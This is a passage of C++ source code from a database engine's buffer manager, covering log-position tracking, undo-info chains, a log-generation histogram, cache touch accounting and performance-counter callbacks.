OSFormatLgpos( lgposOldestBegin0 ),
OSFormatLgpos( lgpos ) ) );
}
void BFIResetLgposOldestBegin0( PBF pbf, BOOL fCalledFromSet )
{
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
// save the current lgposOldestBegin0 for this BF
LGPOS lgposOldestBegin0 = pbf->lgposOldestBegin0;
// delete ourself from the Oldest Begin 0 index or the overflow list
if ( CmpLgpos( &lgposOldestBegin0, &lgposMax ) )
{
FMP* pfmp = &g_rgfmp[ pbf->ifmp ];
pfmp->EnterBFContextAsReader();
BFFMPContext* pbffmp = (BFFMPContext*)pfmp->DwBFContext();
Assert( pbffmp ); // pbffmp->fCurrentlyAttached doesn't matter for resetting logpos OB0
if ( pbf->fInOB0OL )
{
pbf->fInOB0OL = fFalse;
pbffmp->critbfob0ol.Enter();
pbffmp->bfob0ol.Remove( pbf );
pbffmp->critbfob0ol.Leave();
}
else
{
BFOB0::CLock lock;
pbffmp->bfob0.LockKeyPtr( BFIOB0Offset( pbf->ifmp, &lgposOldestBegin0 ), pbf, &lock );
BFOB0::ERR errOB0 = pbffmp->bfob0.ErrDeleteEntry( &lock );
Assert( errOB0 == BFOB0::ERR::errSuccess );
pbffmp->bfob0.UnlockKeyPtr( &lock );
}
pfmp->LeaveBFContextAsReader();
pbf->lgposOldestBegin0 = lgposMax;
}
if ( !fCalledFromSet && CmpLgpos( &lgposOldestBegin0, &lgposMax ) )
{
OSTrace( JET_tracetagBufferManager,
OSFormat( "%s: [%s:%s] lgposOldestBegin0 %s -> %s",
__FUNCTION__,
OSFormatUnsigned( pbf->ifmp ),
OSFormatUnsigned( pbf->pgno ),
OSFormatLgpos( lgposOldestBegin0 ),
OSFormatLgpos( lgposMax ) ) );
}
}
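// Sets lgposModify atomically: either resets it to lgposMin (page being cleaned) or advances it
// monotonically via an atomic exchange-max; when the log generation changes, the per-FMP
// modify-generation histogram is updated as well.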
void BFISetLgposModifyEx( PBF pbf, const LGPOS lgpos )
{
// we should either reset or move forward only.
FMP* pfmp = &g_rgfmp[ pbf->ifmp ];
Assert( pfmp );
#ifdef DEBUG
// restrict check to recovery only, for performance reasons and because it is where we are more likely to violate this
// anyways.
if ( ( pfmp->Pinst() != pinstNil ) && pfmp->Pinst()->m_plog->FRecovering() )
{
// Make sure the lgposModify we are setting in this BF is consistent with the required range stamped in the DB header.
BFIAssertReqRangeConsistentWithLgpos( pfmp, lgposMax, lgpos, "SetLgposModify" );
}
#endif // DEBUG
// Create a local copy, so we won't get affected if it changes.
// Do it atomically because removing undo info may change it
// without a latch while a regular user thread might be reading
// the value (the read is also atomic).
LGPOS lgposOld;
if ( CmpLgpos( lgpos, lgposMin ) == 0 )
{
// Taking the max won't work in this case because we're resetting lgposModify.
// Though in this case, we don't foresee such a conflict because if we're
// resetting lgposModify (i.e., the page is being marked as clean), we don't
// expect this buffer to have any associated entries in the version store.
Assert( pbf->prceUndoInfoNext == prceNil );
lgposOld = pbf->lgposModify.LgposAtomicExchange( lgpos );
}
else
{
lgposOld = pbf->lgposModify.LgposAtomicExchangeMax( lgpos );
Assert( CmpLgpos( pbf->lgposModify.LgposAtomicRead(), lgpos ) >= 0 );
}
if ( lgposOld.lGeneration != lgpos.lGeneration )
{
const TLS* const pTLS = Ptls();
bool fLocalLock = false;
if ( !pTLS->PFMP() )
{
CLockDeadlockDetectionInfo::DisableOwnershipTracking();
CLockDeadlockDetectionInfo::DisableDeadlockDetection();
pfmp->EnterBFContextAsReader();
CLockDeadlockDetectionInfo::EnableDeadlockDetection();
CLockDeadlockDetectionInfo::EnableOwnershipTracking();
fLocalLock = true;
}
else
{
// upper functions have already locked the BFFMP context
Assert( pTLS->PFMP() == pfmp );
}
BFFMPContext* pbffmp = ( BFFMPContext* )pfmp->DwBFContext();
Assert( pbffmp );
pbffmp->m_logHistModify.Update( lgposOld, lgpos, pbf->ifmp );
if ( fLocalLock )
{
// release only when we locked the BFFMP context
CLockDeadlockDetectionInfo::DisableOwnershipTracking();
CLockDeadlockDetectionInfo::DisableDeadlockDetection();
pfmp->LeaveBFContextAsReader();
CLockDeadlockDetectionInfo::EnableDeadlockDetection();
CLockDeadlockDetectionInfo::EnableOwnershipTracking();
}
}
}
void BFISetLgposModify( PBF pbf, LGPOS lgpos )
{
// the new lgposModify is later than the current lgposModify
if ( CmpLgpos( &pbf->lgposModify, &lgpos ) < 0 )
{
Assert( ( pbf->bfdf >= bfdfDirty ) && ( pbf->bfdf < bfdfMax ) );
// set the new lgposModify
BFISetLgposModifyEx( pbf, lgpos );
BFITraceSetLgposModify( pbf, lgpos );
}
}
void BFIResetLgposModify( PBF pbf )
{
BFISetLgposModifyEx( pbf, lgposMin );
}
void BFIAddUndoInfo( PBF pbf, RCE* prce, BOOL fMove )
{
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
// add this RCE to the RCE chain off of the BF
prce->AddUndoInfo( pbf->pgno, pbf->prceUndoInfoNext, fMove );
// put this RCE at the head of the list
pbf->prceUndoInfoNext = prce;
}
void BFIRemoveUndoInfo( PBF pbf, RCE* prce, LGPOS lgposModify, BOOL fMove )
{
// depend this BF on the specified lgposModify
BFISetLgposModify( pbf, lgposModify );
// if this RCE is at the head of the list, fix up the next pointer in the BF
if ( pbf->prceUndoInfoNext == prce )
{
pbf->prceUndoInfoNext = prce->PrceUndoInfoNext();
}
// remove the RCE from the RCE chain off of the BF
prce->RemoveUndoInfo( fMove );
}
// reserve up to cpgWanted pages from the avail pool
// this doesn't have to be exact so it isn't synchronized
BFReserveAvailPages::BFReserveAvailPages( const CPG cpgWanted )
{
// save these variables here to avoid concurrency errors caused
// by evaluating them multiple times
const LONG cbfAvail = (LONG)g_bfavail.Cobject();
const LONG cpgReserved = s_cpgReservedTotal;
m_cpgReserved = min( max( ( cbfAvail - cpgReserved ) / 2 , 0 ), cpgWanted );
Assert( m_cpgReserved <= cpgWanted );
Assert( m_cpgReserved >= 0 );
AtomicExchangeAdd( &s_cpgReservedTotal, m_cpgReserved );
}
// release the page reservation
BFReserveAvailPages::~BFReserveAvailPages()
{
AtomicExchangeAdd( &s_cpgReservedTotal, -m_cpgReserved );
}
// get the number of reserved pages
CPG BFReserveAvailPages::CpgReserved() const
{
Assert( m_cpgReserved >= 0 );
return m_cpgReserved;
}
LONG BFReserveAvailPages::s_cpgReservedTotal = 0;
//================================================
// move BFs from one log generation to another
//================================================
VOID BFLogHistogram::Update( const LGPOS lgposOld, const LGPOS lgposNew, IFMP ifmp )
{
Assert( lgposOld.lGeneration != lgposNew.lGeneration );
INT iGroup = m_ms.Enter();
Assert( 0 == iGroup || 1 == iGroup );
LogHistData* pData = &m_rgdata[ iGroup ];
//========================
// delete from old log generation
if ( CmpLgpos( &lgposMin, &lgposOld ) )
{
Assert( lgposOld.lGeneration < pData->m_lgenBase + pData->m_cgen );
const LONG iOld = lgposOld.lGeneration - pData->m_lgenBase;
if ( pData->m_rgc && 0 <= iOld )
{
AtomicDecrement( &pData->m_rgc[ iOld ] );
}
else
{
AtomicDecrement( &pData->m_cOverflow );
}
}
//========================
// add to new log generation
if ( CmpLgpos( &lgposMin, &lgposNew ) )
{
//========================
// overflow?
while ( pData->m_lgenBase + pData->m_cgen <= lgposNew.lGeneration )
{
m_ms.Leave( iGroup );
if ( m_crit.FTryEnter() )
{
const INT iGroupActive = m_ms.GroupActive();
LogHistData* const pDataActive = &m_rgdata[ iGroupActive ];
//========================
// still overflow inside m_crit?
if ( pDataActive->m_lgenBase + pDataActive->m_cgen <= lgposNew.lGeneration )
{
const BOOL fCleanUpStateSaved = FOSSetCleanupState( fFalse );
ReBase( ifmp, lgposNew.lGeneration );
// Restore cleanup checking
FOSSetCleanupState( fCleanUpStateSaved );
}
m_crit.Leave();
}
else
{
UtilSleep( 1 );
}
iGroup = m_ms.Enter();
pData = &m_rgdata[ iGroup ];
}
LONG idxData = lgposNew.lGeneration - pData->m_lgenBase;
if ( pData->m_rgc && 0 <= idxData )
{
AtomicIncrement( &pData->m_rgc[ idxData ] );
}
else
{
AtomicIncrement( &pData->m_cOverflow );
}
}
m_ms.Leave( iGroup );
}
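// Rotates the histogram to a new base generation (under m_crit): prepares the inactive group's
// array, partitions readers out of the old group via m_ms.Partition(), and then migrates the
// old counts into the new group (fully retired generations collapse into the overflow bucket).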
VOID BFLogHistogram::ReBase( IFMP ifmp, LONG lgenLatest )
{
Assert( m_crit.FOwner() );
LOG* const plog = PinstFromIfmp( ifmp )->m_plog;
const LONG igen = plog->LgposGetCheckpoint().le_lGeneration;
const LONG cgen = plog->LgposLGLogTipNoLock().lGeneration - igen + 1;
const LONG cgenActual = LNextPowerOf2( cgen + cgenNewMin );
Assert( cgenActual > 0 );
INT iGroup = m_ms.GroupActive();
Assert( 0 == iGroup || 1 == iGroup );
LogHistData* const pDataOld = &m_rgdata[ iGroup ];
LogHistData* const pDataNew = &m_rgdata[ 1 - iGroup ];
// arrange new memory
if ( pDataNew->m_rgc && cgenActual <= pDataNew->m_cgen )
{
// reuse existing memory
}
else
{
// allocate bigger memory
delete[] pDataNew->m_rgc;
if ( pDataNew->m_rgc = new LONG[ cgenActual ] )
{
pDataNew->m_cgen = cgenActual;
}
else
{
// OOM, retry at next log generation
pDataNew->m_cgen = 0;
}
}
memset( pDataNew->m_rgc, 0, sizeof( pDataNew->m_rgc[ 0 ] ) * pDataNew->m_cgen );
pDataNew->m_cOverflow = 0;
// decide histogram start point
if ( pDataOld->m_rgc && pDataNew->m_rgc )
{
// no OOM, rebase to max( checkpoint, oldbase)
pDataNew->m_lgenBase = max( igen, pDataOld->m_lgenBase );
}
else
{
// recovery from OOM ( m_rgc ), rebase to latest
// enter into OOM ( !m_rgc ), rebase to latest + 1
Assert( pDataOld->m_lgenBase + pDataOld->m_cgen <= lgenLatest );
pDataNew->m_lgenBase = lgenLatest + ( pDataNew->m_rgc ? 0 : 1 );
}
//================
// partition!!
m_ms.Partition();
// histogram migration
if ( pDataOld->m_rgc )
{
Assert( pDataOld->m_lgenBase <= pDataNew->m_lgenBase );
// retired portion
LONG cgenMax = min( pDataOld->m_cgen, pDataNew->m_lgenBase - pDataOld->m_lgenBase );
for ( LONG i = 0; i < cgenMax; ++i )
{
LONG c = pDataOld->m_rgc[ i ];
pDataOld->m_rgc[ i ] = 0;
pDataOld->m_cOverflow += c;
}
// overlapping portion (if any)
for ( LONG i = pDataNew->m_lgenBase; i < pDataOld->m_lgenBase + pDataOld->m_cgen; ++i )
{
LONG c = pDataOld->m_rgc[ i - pDataOld->m_lgenBase ];
pDataOld->m_rgc[ i - pDataOld->m_lgenBase ] = 0;
if ( pDataNew->m_rgc )
{
AtomicExchangeAdd( &pDataNew->m_rgc[ i - pDataNew->m_lgenBase ], c );
}
else
{
AtomicExchangeAdd( &pDataNew->m_cOverflow, c );
}
}
// verify that we don't miss any dirty BFs!!
for ( LONG i = 0; i < pDataOld->m_cgen; ++i )
{
Assert( 0 == pDataOld->m_rgc[ i ] );
}
}
// carry over the overflow (if any)
AtomicExchangeAdd( &pDataNew->m_cOverflow, pDataOld->m_cOverflow );
}
// return the total number of modified and pinned BFs
BFSTAT BFLogHistogram::Read( void )
{
static BFSTAT bfstatCache( 0, 0 );
volatile static TICK tickCacheLoad = 0;
const TICK tickCacheLife = 200; // cache is good for 200ms
// good enough, don't bother with locks.
TICK tickNow = TickOSTimeCurrent();
if ( tickNow - tickCacheLoad < tickCacheLife )
{
return bfstatCache;
}
tickCacheLoad = tickNow;
LONG cBFMod = 0;
LONG cBFPin = 0;
// lock! so, critical information of g_rgfmp array won't change
FMP::EnterFMPPoolAsReader();
if ( g_rgfmp )
{
for ( IFMP ifmp = FMP::IfmpMinInUse(); ifmp <= FMP::IfmpMacInUse(); ifmp++ )
{
FMP* const pfmp = &g_rgfmp[ ifmp ];
if ( pfmp )
{
pfmp->EnterBFContextAsReader();
BFFMPContext* const pbffmp = ( BFFMPContext* )pfmp->DwBFContext();
if ( pfmp->FInUse() && !pfmp->FIsTempDB() && pbffmp )
{
BFLogHistogram* const pHist = &pbffmp->m_logHistModify;
INT iGroup = pHist->m_ms.Enter();
LogHistData* pData = &pHist->m_rgdata[ iGroup ];
LONG lgenWaypoint = pfmp->LgposWaypoint().lGeneration;
cBFMod += pData->m_cOverflow;
cBFPin += ( !pData->m_rgc || lgenWaypoint < pData->m_lgenBase ) ? pData->m_cOverflow : 0;
if ( pData->m_rgc )
{
for ( LONG i = 0; i < pData->m_cgen; ++i )
{
LONG c = pData->m_rgc[ i ];
cBFMod += c;
cBFPin += ( pData->m_lgenBase + i < lgenWaypoint ) ? 0 : c;
}
}
pHist->m_ms.Leave( iGroup );
}
pfmp->LeaveBFContextAsReader();
}
}
}
FMP::LeaveFMPPoolAsReader();
// good enough, don't bother with locks or interlockedexchange8B
BFSTAT bfstatRet( cBFMod, cBFPin );
bfstatCache = bfstatRet;
return bfstatRet;
}
INLINE void BFIMarkAsSuperCold( PBF pbf, const BOOL fUser )
{ // the caller needs X access to this bf so that we can set fNewlyEvicted safely.
Assert( pbf->sxwl.FOwnExclusiveLatch() ||
pbf->sxwl.FOwnWriteLatch() ||
// this last case is we have the virtual write latch from lockless write IO
( pbf->err == wrnBFPageFlushPending && NULL == pbf->pWriteSignalComplete ) );
g_bflruk.MarkAsSuperCold( pbf );
// to keep parity with other BF/resmgr traces, we'll only trace super-cold calls
// for current versions
if ( !pbf->fOlderVersion )
{
Assert( pbf->fCurrentVersion );
BFITraceMarkPageAsSuperCold( pbf->ifmp, pbf->pgno );
}
// mark this BF as "newly evicted" so that when it is actually evicted
// we will mark it as not "newly evicted". this will make it so that
// super-cold pages do not cause cache growth when they are reused
pbf->fNewlyEvicted = fTrue;
// update perf counters to indicate activity
if ( fUser )
{
PERFOpt( cBFSuperColdsUser.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
}
else
{
PERFOpt( cBFSuperColdsInternal.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
}
}
C_ASSERT( sizeof(CPAGE::PGHDR) == 40 );
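// Touches pbf in the LRU-K resource manager (when fTouchPage is set), updates the unique cache
// request/hit perf counters and thread stats for touches whose previous touch is at or before the
// last sampling reset, and emits the page request trace.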
INLINE void BFITouchResource(
__in const PBF pbf,
__in const BFLatchType bfltTraceOnly,
__in const BFLatchFlags bflfTraceOnly,
__in const BOOL fTouchPage,
__in const ULONG_PTR pctCachePriority,
__in const TraceContext& tc )
{
const TICK tickTouch = TickOSTimeCurrent();
const BOOL fNewPage = ( bflfTraceOnly & ( bflfNew | bflfNewIfUncached ) );
const BOOL fDBScan = ( bflfTraceOnly & bflfDBScan );
const BFRequestTraceFlags bfrtf = BFRequestTraceFlags(
( fTouchPage ? bfrtfNone : bfrtfNoTouch ) |
( fNewPage ? bfrtfNewPage : bfrtfUseHistory ) |
( BoolParam( JET_paramEnableFileCache ) ? bfrtfFileCacheEnabled : bfrtfNone ) |
( fDBScan ? bfrtfDBScan : bfrtfNone ) );
if ( fTouchPage )
{
// Technically, this is an Expected(), though it is a real problem for the resmgr replayer, so
// we'll leave it as an assert. Besides, it's indeed silly to be touching an older buffer
// anyways.
AssertSz( pbf->fCurrentVersion && !pbf->fOlderVersion, "We should not be touching an older version of a page." );
const TICK tickLastBefore = pbf->lrukic.TickLastTouchTime();
const BFLRUK::ResMgrTouchFlags rmtf = g_bflruk.RmtfTouchResource( pbf, pctCachePriority, tickTouch );
// This will count as a unique request/touch iff the last touch timestamp of the page
// is older than the last reset timestamp for calculating unique requests.
// Also, filter out kNoTouch to avoid multiple threads double-counting this.
if ( ( rmtf != BFLRUK::kNoTouch ) && !fDBScan )
{
const BOOL fUpdatePerfCounter = ( TickCmp( tickLastBefore, g_tickBFUniqueReqLast ) <= 0 );
const BOOL fUpdateThreadStats = ( TickCmp( tickLastBefore, Ptls()->TickThreadStatsLast() ) <= 0 );
if ( fUpdatePerfCounter || fUpdateThreadStats )
{
OnDebug( const TICK tickLastAfter = pbf->lrukic.TickLastTouchTime() );
Assert( TickCmp( tickLastAfter, tickLastBefore ) >= 0 );
if ( fUpdatePerfCounter )
{
PERFOpt( cBFCacheUniqueReq.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce, pbf->ifmp ) );
PERFOpt( cBFCacheUniqueHit.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce, pbf->ifmp ) );
}
if ( fUpdateThreadStats )
{
Ptls()->threadstats.cPageUniqueCacheRequests++;
Ptls()->threadstats.cPageUniqueCacheHits++;
}
}
}
}
BFITraceRequestPage( tickTouch, pbf, (ULONG)pctCachePriority, bfltTraceOnly, bflfTraceOnly, bfrtf, tc );
}
#ifdef PERFMON_SUPPORT
//
// Performance Monitoring Support
//
PERFInstanceLiveTotalWithClass<ULONG> cBFCacheMiss;
LONG LBFCacheMissesCEFLPv( LONG iInstance, void* pvBuf )
{
cBFCacheMiss.PassTo( iInstance, pvBuf );
return 0;
}
LONG LBFCacheHitsCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
*( (ULONG*) pvBuf ) = cBFCacheReq.Get( iInstance ) - cBFCacheMiss.Get( iInstance );
}
return 0;
}
PERFInstanceLiveTotalWithClass<ULONG> cBFCacheReq;
LONG LBFCacheReqsCEFLPv( LONG iInstance, void* pvBuf )
{
cBFCacheReq.PassTo( iInstance, pvBuf );
return 0;
}
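// Timestamp of the last "unique request" sampling reset; BFITouchResource() counts a touch as
// unique iff the page's previous touch is at or before this, and LBFCacheUniqueReqsCEFLPv() below
// advances it at most once per second.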
TICK g_tickBFUniqueReqLast = 0;
PERFInstanceLiveTotalWithClass<ULONG, INST, 2> cBFCacheUniqueHit;
PERFInstanceLiveTotalWithClass<ULONG, INST, 2> cBFCacheUniqueReq;
LONG LBFCacheUniqueHitsCEFLPv( LONG iInstance, void* pvBuf )
{
cBFCacheUniqueHit.PassTo( iInstance, pvBuf );
return 0;
}
LONG LBFCacheUniqueReqsCEFLPv( LONG iInstance, void* pvBuf )
{
cBFCacheUniqueReq.PassTo( iInstance, pvBuf );
// Only reset this every second at the most.
const TICK tickNow = TickOSTimeCurrent();
if ( DtickDelta( g_tickBFUniqueReqLast, tickNow ) >= 1000 )
{
g_tickBFUniqueReqLast = tickNow;
}
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFSuperColdsUser;
LONG LBFSuperColdsUserCEFLPv( LONG iInstance, void* pvBuf )
{
cBFSuperColdsUser.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFSuperColdsInternal;
LONG LBFSuperColdsInternalCEFLPv( LONG iInstance, void* pvBuf )
{
cBFSuperColdsInternal.PassTo( iInstance, pvBuf );
return 0;
}
LONG LBFCleanBuffersCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
*( (ULONG*) pvBuf ) = g_cbfCacheClean;
}
return 0;
}
LONG LBFPinnedBuffersCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
//BFSTAT bfStat = BFLogHistogram::Read();
//*( ( LONG* ) pvBuf ) = bfStat.m_cBFPin;
*( ( LONG* ) pvBuf ) = 0;
}
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesReadAsync;
LONG LBFPagesReadAsyncCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesReadAsync.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesReadSync;
LONG LBFPagesReadSyncCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesReadSync.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFDirtied;
LONG LBFPagesDirtiedCEFLPv( LONG iInstance, void* pvBuf )
{
cBFDirtied.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFDirtiedRepeatedly;
LONG LBFPagesDirtiedRepeatedlyCEFLPv( LONG iInstance, void* pvBuf )
{
cBFDirtiedRepeatedly.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesWritten;
LONG LBFPagesWrittenCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesWritten.PassTo( iInstance, pvBuf );
return 0;
}
LONG LBFPagesTransferredCEFLPv( LONG iInstance, void* pvBuf )
{
if ( NULL != pvBuf )
{
*( (LONG *) pvBuf ) = cBFPagesReadAsync.Get( iInstance )
+ cBFPagesReadSync.Get( iInstance )
+ cBFPagesWritten.Get( iInstance );
}
return 0;
}
// OS MM trimming / reclaim counters
//
// - Database Pages Non-Resident Trimmed by OS/sec
// - Database Pages Non-Resident Reclaimed (Hard Faulted)/sec
// - Database Pages Non-Resident Reclaimed (Soft Faulted)/sec
// - Database Pages Non-Resident Reclaimed (Failed)/sec
// - Database Pages Non-Resident Re-read/sec
// - Database Pages Non-Resident Evicted (Normally)/sec
// - Database Pages Non-Resident Hard Faulted In Latency (us)/sec
//
// Some notes:
// - "Reclaimed (Soft Faulted)" and "Evicted (Normally)" are the ideal cases
// as we re-used the memory before it got paged to disk, or decided to evict
// the page normally respectively.
// - "Reclaimed (Failed)" is not equal to "Re-read" ... we can fail a reclaim
// and then not increment Re-read if it is a new page request.
LONG g_cbfTrimmed;
LONG LBFPagesNonResidentTrimmedByOsCEFLPv( LONG iInstance, VOID * pvBuf )
{
if ( pvBuf )
{
// I don't understand how this works, as a LONG will wrap ... but there are other
// instances of this in our perf counters.
// Update: Pretty sure this works because these (or at least this one) perf counters
// are using a delta operation to compute the rate per second. However, if the perf
// counter was being used via its RAW count for a test or tool, then we would need
// to move this to a 64-bit number.
*( (ULONG*) pvBuf ) = g_cbfTrimmed;
}
return 0;
}
LONG g_cbfNonResidentReclaimedSuccess;
LONG LBFPagesNonResidentReclaimedSuccessCEFLPv( LONG iInstance, VOID * pvBuf )
{
if ( pvBuf )
{
*( (ULONG*) pvBuf ) = g_cbfNonResidentReclaimedSuccess;
}
return 0;
}
LONG g_cbfNonResidentReclaimedFailed;
LONG LBFPagesNonResidentReclaimedFailedCEFLPv( LONG iInstance, VOID * pvBuf )
{
if ( pvBuf )
{
*( (ULONG*) pvBuf ) = g_cbfNonResidentReclaimedFailed;
}
return 0;
}
LONG g_cbfNonResidentRedirectedToDatabase;
LONG LBFPagesNonResidentRedirectedToDatabaseCEFLPv( LONG iInstance, VOID * pvBuf )
{
if ( pvBuf )
{
*( (ULONG*) pvBuf ) = g_cbfNonResidentRedirectedToDatabase;
}
return 0;
}
LONG g_cbfNonResidentEvicted;
LONG LBFPagesNonResidentEvictedCEFLPv( LONG iInstance, VOID * pvBuf )
{
if ( pvBuf )
{
*( (ULONG*) pvBuf ) = g_cbfNonResidentEvicted;
}
return 0;
}
LONG g_cbfNonResidentReclaimedHardSuccess;
LONG LPagesNonResidentReclaimedHardSuccessCEFLPv( LONG iInstance, VOID * pvBuf )
{
if ( pvBuf )
{
*( (ULONG*) pvBuf ) = g_cbfNonResidentReclaimedHardSuccess;
}
return 0;
}
// A 63-bit integer gives us 14.6 years @ 20 second latencies @ 1000 faults\IOs per
// second (or really sample period).
unsigned __int64 g_cusecNonResidentFaultedInLatencyTotal;
LONG LBFPagesNonResidentFaultedInLatencyUsCEFLPv( LONG iInstance, VOID * pvBuf )
{
if ( pvBuf )
{
*( (unsigned __int64*) pvBuf ) = g_cusecNonResidentFaultedInLatencyTotal;
}
return 0;
}
// Latch counters
//
LONG LBFLatchCEFLPv( LONG iInstance, void* pvBuf )
{
cBFCacheReq.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstance<> cBFSlowLatch;
LONG LBFFastLatchCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
*( (ULONG*) pvBuf ) = cBFCacheReq.Get( iInstance ) - cBFSlowLatch.Get( iInstance );
}
return 0;
}
PERFInstance<> cBFBadLatchHint;
LONG LBFBadLatchHintCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
cBFBadLatchHint.PassTo( iInstance, pvBuf );
}
return 0;
}
PERFInstance<> cBFLatchConflict;
LONG LBFLatchConflictCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
cBFLatchConflict.PassTo( iInstance, pvBuf );
}
return 0;
}
PERFInstance<> cBFLatchStall;
LONG LBFLatchStallCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
cBFLatchStall.PassTo( iInstance, pvBuf );
}
return 0;
}
LONG LBFAvailBuffersCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = g_fBFInitialized ? g_bfavail.Cobject() : 0;
return 0;
}
LONG LBFCacheFaultCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = g_fBFInitialized ? g_bfavail.CRemove() : 0;
return 0;
}
LONG LBFCacheEvictCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = g_cbfNewlyEvictedUsed;
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFCacheEvictUntouched;
LONG LBFCacheEvictUntouchedCEFLPv( LONG iInstance, void* pvBuf )
{
cBFCacheEvictUntouched.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFCacheEvictk1;
LONG LBFCacheEvictk1CEFLPv( LONG iInstance, void* pvBuf )
{
cBFCacheEvictk1.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFCacheEvictk2;
LONG LBFCacheEvictk2CEFLPv( LONG iInstance, void* pvBuf )
{
cBFCacheEvictk2.PassTo( iInstance, pvBuf );
return 0;
}
// because first reason starts at 1, and we don't subtract bfefReasonMin, we're wasting one slot. Not a big deal though.
PERFInstanceLiveTotalWithClass<> rgcBFCacheEvictReasons[bfefReasonMax];
LONG LBFCacheEvictScavengeAvailPoolCEFLPv( LONG iInstance, void* pvBuf )
{
C_ASSERT( bfefReasonAvailPool < _countof(rgcBFCacheEvictReasons) );
rgcBFCacheEvictReasons[bfefReasonAvailPool].PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFCacheEvictScavengeSuperColdInternal;
LONG LBFCacheEvictScavengeSuperColdInternalCEFLPv( LONG iInstance, void* pvBuf )
{
cBFCacheEvictScavengeSuperColdInternal.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFCacheEvictScavengeSuperColdUser;
LONG LBFCacheEvictScavengeSuperColdUserCEFLPv( LONG iInstance, void* pvBuf )
{
cBFCacheEvictScavengeSuperColdUser.PassTo( iInstance, pvBuf );
return 0;
}
LONG LBFCacheEvictScavengeShrinkCEFLPv( LONG iInstance, void* pvBuf )
{
C_ASSERT( bfefReasonShrink < _countof(rgcBFCacheEvictReasons) );
rgcBFCacheEvictReasons[bfefReasonShrink].PassTo( iInstance, pvBuf );
return 0;
}
LONG LBFCacheEvictOtherCEFLPv( LONG iInstance, void* pvBuf )
{
C_ASSERT( bfefReasonPurgeContext < _countof(rgcBFCacheEvictReasons) );
C_ASSERT( bfefReasonPurgePage < _countof(rgcBFCacheEvictReasons) );
C_ASSERT( bfefReasonPatch < _countof(rgcBFCacheEvictReasons) );
if ( pvBuf != NULL )
{
LONG lBufPurgeContext, lBufPurgePage, lBufPatch;
rgcBFCacheEvictReasons[bfefReasonPurgeContext].PassTo( iInstance, &lBufPurgeContext );
rgcBFCacheEvictReasons[bfefReasonPurgePage].PassTo( iInstance, &lBufPurgePage );
rgcBFCacheEvictReasons[bfefReasonPatch].PassTo( iInstance, &lBufPatch );
*( (LONG*)pvBuf ) = lBufPurgeContext + lBufPurgePage + lBufPatch;
}
return 0;
}
LONG LBFAvailStallsCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = g_fBFInitialized ? g_bfavail.CRemoveWait() : 0;
return 0;
}
LONG LBFTotalBuffersCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = (ULONG)( g_fBFInitialized ? cbfCacheSize : 1 );
return 0;
}
LONG LBFTotalBuffersUsedCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = (ULONG)( g_fBFInitialized ? CbfBFICacheUsed() : 1 );
return 0;
}
LONG LBFTotalBuffersCommittedCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = (ULONG)( g_fBFInitialized ? CbfBFICacheCommitted() : 1 );
return 0;
}
LONG LBFCacheSizeCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (unsigned __int64*) pvBuf ) = CbBFICacheSizeUsedDehydrated();
return 0;
}
LONG LBFCacheSizeMBCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (unsigned __int64*) pvBuf ) = ( CbBFICacheSizeUsedDehydrated() / ( 1024 * 1024 ) );
return 0;
}
LONG LBFCacheSizeEffectiveCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (unsigned __int64*) pvBuf ) = CbBFICacheISizeUsedHydrated();
return 0;
}
LONG LBFCacheSizeEffectiveMBCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (unsigned __int64*) pvBuf ) = ( CbBFICacheISizeUsedHydrated() / ( 1024 * 1024 ) );
return 0;
}
LONG LBFCacheMemoryReservedCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (unsigned __int64*) pvBuf ) = CbBFICacheIMemoryReserved();
return 0;
}
